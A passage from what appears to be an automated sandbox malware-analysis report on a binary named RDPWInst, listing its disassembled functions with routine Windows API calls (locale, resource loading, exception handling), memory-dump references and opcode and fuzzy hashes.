                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: LocaleThread
                                                                                                              • String ID: 0\D$`\D$|\D
                                                                                                              • API String ID: 635194068-1443555069
                                                                                                              • Opcode ID: 0cc7b5f362df3f3b22b96f6267770b75cfda245be271edcbb912247af85876fd
                                                                                                              • Instruction ID: 0f9472f532bfb6d97ff063cc401fba787666d5dde08e68930300e7878c0b733c
                                                                                                              • Opcode Fuzzy Hash: 0cc7b5f362df3f3b22b96f6267770b75cfda245be271edcbb912247af85876fd
                                                                                                              • Instruction Fuzzy Hash: 0831E871F006086BDB04DA55D891BAF73B9DB88314F65803BFA05E7382D67CED5183A8
                                                                                                              Function 00412D04 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 106threadCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetThreadLocale.KERNEL32(00000000,00412E17,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00412D20
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: LocaleThread
                                                                                                              • String ID: 0\D$`\D$|\D
                                                                                                              • API String ID: 635194068-1443555069
                                                                                                              • Opcode ID: c41b53ad99340a58dd1ea3df1ca7b54c87d2f8ec0189060bbe7d6b41ea99f8a8
                                                                                                              • Instruction ID: e329392f02449b06687ba54e558461cdf4d213220e6431f4601da2913400d418
                                                                                                              • Opcode Fuzzy Hash: c41b53ad99340a58dd1ea3df1ca7b54c87d2f8ec0189060bbe7d6b41ea99f8a8
                                                                                                              • Instruction Fuzzy Hash: A631E871F006086BDB04DA45D891BAF73B9DB88314F65803BFA05E7382D67CED5183A8
                                                                                                              Function 004114A4 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 80threadCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,00411595), ref: 0041152C
                                                                                                              • GetDateFormatW.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,00411595), ref: 00411532
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: DateFormatLocaleThread
                                                                                                              • String ID: $yyyy
                                                                                                              • API String ID: 3303714858-404527807
                                                                                                              • Opcode ID: 5e56a81e6ec8d75afdc6e5fb3bd2dd6b96c822b9e08f0a8d12efe2345fd405b1
                                                                                                              • Instruction ID: 4e3523b49621e94f0abc5fe99f3e528012799777c4c12a7b6b737367db96c017
                                                                                                              • Opcode Fuzzy Hash: 5e56a81e6ec8d75afdc6e5fb3bd2dd6b96c822b9e08f0a8d12efe2345fd405b1
                                                                                                              • Instruction Fuzzy Hash: 8F219531A00118ABD710EF55C941AEEB3FAEF48300F514077F905E72A1D6389E40C7A9
                                                                                                              Function 0043C45C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 59COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000200,00000000,0043C52D,?,00447324,?,0043F7DC,00000000,0043FAEE,?,?,?,00447324), ref: 0043C4F1
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: EnvironmentExpandStrings
                                                                                                              • String ID: $sD$%ProgramFiles%$%ProgramW6432%
                                                                                                              • API String ID: 237503144-3145546840
                                                                                                              • Opcode ID: c5f063dfebfa4231b205ec39474c4c55e757e18b534536750d11f4516631b0cd
                                                                                                              • Instruction ID: dfc59d650baf98a512f6366ea296a42dbe4730e7440a0cbc8b484aecff229b80
                                                                                                              • Opcode Fuzzy Hash: c5f063dfebfa4231b205ec39474c4c55e757e18b534536750d11f4516631b0cd
                                                                                                              • Instruction Fuzzy Hash: 411184B0604168ABD714EB65CD92A9DB7B9DB48304F5140BBA205F3292DB38EE558B1C
                                                                                                              Function 0040AEAC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • FindResourceW.KERNEL32(00400000,CHARTABLE,0000000A,?,?,0040ADC8,?,0040EE39,00000000,0040EF55), ref: 0040AEC0
                                                                                                              • LoadResource.KERNEL32(00400000,00000000,00400000,CHARTABLE,0000000A,?,?,0040ADC8,?,0040EE39,00000000,0040EF55), ref: 0040AED7
                                                                                                              • LockResource.KERNEL32(00000000,00400000,00000000,00400000,CHARTABLE,0000000A,?,?,0040ADC8,?,0040EE39,00000000,0040EF55), ref: 0040AEE8
                                                                                                                • Part of subcall function 00415A68: GetLastError.KERNEL32(0040AEF9,00000000,00400000,00000000,00400000,CHARTABLE,0000000A,?,?,0040ADC8,?,0040EE39,00000000,0040EF55), ref: 00415A68
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Resource$ErrorFindLastLoadLock
                                                                                                              • String ID: CHARTABLE
                                                                                                              • API String ID: 1074440638-2668339182
                                                                                                              • Opcode ID: 2576ac7df62392cdd79f5341252eb240a6292d2d2deea21fb17a0e0107b6f450
                                                                                                              • Instruction ID: 0ebed5ed6e5dda7701dd75a560580c35c1b3b1e5272f816bd12d169416f3b400
                                                                                                              • Opcode Fuzzy Hash: 2576ac7df62392cdd79f5341252eb240a6292d2d2deea21fb17a0e0107b6f450
                                                                                                              • Instruction Fuzzy Hash: 4E0180B87803018FC718EF59D8D1A9A73E9AB99320709453EE241577A1CF3C9C40DB59
                                                                                                              Function 00419584 Relevance: 6.1, APIs: 4, Instructions: 115COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 00419633
                                                                                                              • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0041964F
                                                                                                              • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 004196C6
                                                                                                              • VariantClear.OLEAUT32(?), ref: 004196EF
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                                              • String ID:
                                                                                                              • API String ID: 920484758-0
                                                                                                              • Opcode ID: 0f680bb846408bca051d329f0f9141866d040382b2d86f627a051af50f217def
                                                                                                              • Instruction ID: d3a60771d8c98d42dda0da8010ad17e71a6e6e293320ab5b6f42a6f3f22a61d9
                                                                                                              • Opcode Fuzzy Hash: 0f680bb846408bca051d329f0f9141866d040382b2d86f627a051af50f217def
                                                                                                              • Instruction Fuzzy Hash: F7410D75A0061D9FCB61DF59CC90BD9B3FCAB48314F0055DAE549A7212DA38AFC18F64
                                                                                                              Function 0041325C Relevance: 6.1, APIs: 4, Instructions: 113COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • VirtualQuery.KERNEL32(?,?,0000001C,00000000,00413408), ref: 0041328F
                                                                                                              • GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 004132B3
                                                                                                              • GetModuleFileNameW.KERNEL32(00400000,?,00000105), ref: 004132CE
                                                                                                              • LoadStringW.USER32(00000000,0000FFE5,?,00000100), ref: 00413369
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 3990497365-0
                                                                                                              • Opcode ID: b4db8f4b60a4758e302225d89cd2c63d37b5a2fd60e804dc2dc20906c96adb53
                                                                                                              • Instruction ID: 83055b0679be0c1ffa726a7bf1997f9f19e1454b2f4a6b728642dd338ff24854
                                                                                                              • Opcode Fuzzy Hash: b4db8f4b60a4758e302225d89cd2c63d37b5a2fd60e804dc2dc20906c96adb53
                                                                                                              • Instruction Fuzzy Hash: 80412070A003589FDB20EF59CC81BCAB7B9AB49304F0040FAE508E7251DB7A9E94CF59
                                                                                                              Function 00408B08 Relevance: 6.1, APIs: 4, Instructions: 97threadCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetThreadUILanguage.KERNEL32(?,00000000), ref: 00408B19
                                                                                                              • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 00408B7B
                                                                                                              • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 00408BD8
                                                                                                              • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 00408C0B
                                                                                                                • Part of subcall function 00408AC4: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,00408B89), ref: 00408ADB
                                                                                                                • Part of subcall function 00408AC4: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,00408B89), ref: 00408AF8
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Thread$LanguagesPreferred$Language
                                                                                                              • String ID:
                                                                                                              • API String ID: 2255706666-0
                                                                                                              • Opcode ID: 57ba5b2eaa9ba2f7f394178960eeeee68cc8fe68392739164dda0304afca2262
                                                                                                              • Instruction ID: ba3eb85df9a642da38a4383696d7f270617e705f6d5ccbab9dd9f20305666083
                                                                                                              • Opcode Fuzzy Hash: 57ba5b2eaa9ba2f7f394178960eeeee68cc8fe68392739164dda0304afca2262
                                                                                                              • Instruction Fuzzy Hash: 5A317C70A1021A9BDB00DFE9C885AAEB3B5FF44304F00457AE991E72D1DB78AE44CB58
                                                                                                              Function 0042FB48 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • FindResourceW.KERNEL32(00400000,00000000,?,00425E1C,00400000,00000001,00000000,?,0042FA36,00000000,0044BFA8,?,0044BFA8,00000000,?,0043CEE1), ref: 0042FB5F
                                                                                                              • LoadResource.KERNEL32(00400000,0042FBE4,00400000,00000000,?,00425E1C,00400000,00000001,00000000,?,0042FA36,00000000,0044BFA8,?,0044BFA8,00000000), ref: 0042FB79
                                                                                                              • SizeofResource.KERNEL32(00400000,0042FBE4,00400000,0042FBE4,00400000,00000000,?,00425E1C,00400000,00000001,00000000,?,0042FA36,00000000,0044BFA8), ref: 0042FB93
                                                                                                              • LockResource.KERNEL32(0042F774,00000000,00400000,0042FBE4,00400000,0042FBE4,00400000,00000000,?,00425E1C,00400000,00000001,00000000,?,0042FA36,00000000), ref: 0042FB9D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Resource$FindLoadLockSizeof
                                                                                                              • String ID:
                                                                                                              • API String ID: 3473537107-0
                                                                                                              • Opcode ID: 6ebdd4f1cd543b76a016c77fc1286a410c61f79913e5f64509fe1404532659ad
                                                                                                              • Instruction ID: 2319d0df2cd87803d0a75df5626f4cddb48e3135002f19a9a4d545a6677a7621
                                                                                                              • Opcode Fuzzy Hash: 6ebdd4f1cd543b76a016c77fc1286a410c61f79913e5f64509fe1404532659ad
                                                                                                              • Instruction Fuzzy Hash: 49F06DB37012146F9745EEADA881D6B77FDEE88264390017FFA08D7202DA38ED154379
                                                                                                              Function 0040A0E6 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41stringCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • EnterCriticalSection.KERNEL32(00449C1C), ref: 0040A0F8
                                                                                                              • lstrcmpiA.KERNEL32(?,?), ref: 0040A10E
                                                                                                              • LeaveCriticalSection.KERNEL32(00449C1C,00449C1C), ref: 0040A143
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CriticalSection$EnterLeavelstrcmpi
                                                                                                              • String ID: YD
                                                                                                              • API String ID: 2420758022-4277794568
                                                                                                              • Opcode ID: 0b44f2d380ec5fe545f4f2e3965f64519b1ec05f6d6c381fa1d4a9968702bb33
                                                                                                              • Instruction ID: abf7b61c1320a37f19f23f54b7b1c16b8e1f28cb69a34480c51c1f01e8ca554a
                                                                                                              • Opcode Fuzzy Hash: 0b44f2d380ec5fe545f4f2e3965f64519b1ec05f6d6c381fa1d4a9968702bb33
                                                                                                              • Instruction Fuzzy Hash: 8AF062322003145BEF106A619CC2B1677989F15714F100037FB007F2C3D6BC9C60466F
                                                                                                              Function 004059C6 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 124COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • UnhandledExceptionFilter.KERNEL32(00000006,00000000), ref: 00405A9A
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                              • String ID: $$@
                                                                                                              • API String ID: 3192549508-1194432280
                                                                                                              • Opcode ID: ffbabee0d71fd2b7d8fc05915f2ca3a30f23b11c7e3ffcedbc7f052df7b7c5c2
                                                                                                              • Instruction ID: fff674c7101e68f6d73d2d8a69124ddc370c84ad249f2bdacb9cff7d7fa155c1
                                                                                                              • Opcode Fuzzy Hash: ffbabee0d71fd2b7d8fc05915f2ca3a30f23b11c7e3ffcedbc7f052df7b7c5c2
                                                                                                              • Instruction Fuzzy Hash: 1C418C75304A019FD720DB14D884B2BB7A5EB89314F69867AF444AB392C738EC41CF69
                                                                                                              Function 0040589A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • UnhandledExceptionFilter.KERNEL32(00000006,00000000), ref: 00405906
                                                                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,Function_0000589C), ref: 00405943
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                              • String ID: $$@
                                                                                                              • API String ID: 3192549508-1194432280
                                                                                                              • Opcode ID: 23fdc1c80813b7a19c68f0c79cc3fa5e3fa91e7525bef4bca6a264e8681dbcfb
                                                                                                              • Instruction ID: 4b325d1a8302ad8f82e944498d23502563e7d009f61a8d4e6d3783212fd5e4e2
                                                                                                              • Opcode Fuzzy Hash: 23fdc1c80813b7a19c68f0c79cc3fa5e3fa91e7525bef4bca6a264e8681dbcfb
                                                                                                              • Instruction Fuzzy Hash: 533141B4604700EFD720DB10D888B6BBBA9EB84724F54857AF448A7291C738EC40CF69
                                                                                                              Function 00411498 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82threadCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,00411595), ref: 0041152C
                                                                                                              • GetDateFormatW.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,00411595), ref: 00411532
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: DateFormatLocaleThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 3303714858-3916222277
                                                                                                              • Opcode ID: 0d5b63d8b5d64c377b747a6270c18780734cafdd64312a6cbce0b29c00a6c7cf
                                                                                                              • Instruction ID: da40258a30b1bf54e866a7fbbaf5cc9082ba5d6ba5cf06b5a9e2a769468a01f6
                                                                                                              • Opcode Fuzzy Hash: 0d5b63d8b5d64c377b747a6270c18780734cafdd64312a6cbce0b29c00a6c7cf
                                                                                                              • Instruction Fuzzy Hash: 2C21BB31A04254AFC711DF64C8556EA77B5EF49300F4140A7FD45E72A1D6389E50C7AA
                                                                                                              Function 004150E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51threadCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetThreadLocale.KERNEL32 ref: 00415102
                                                                                                              • GetSystemMetrics.USER32(0000004A), ref: 00415153
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
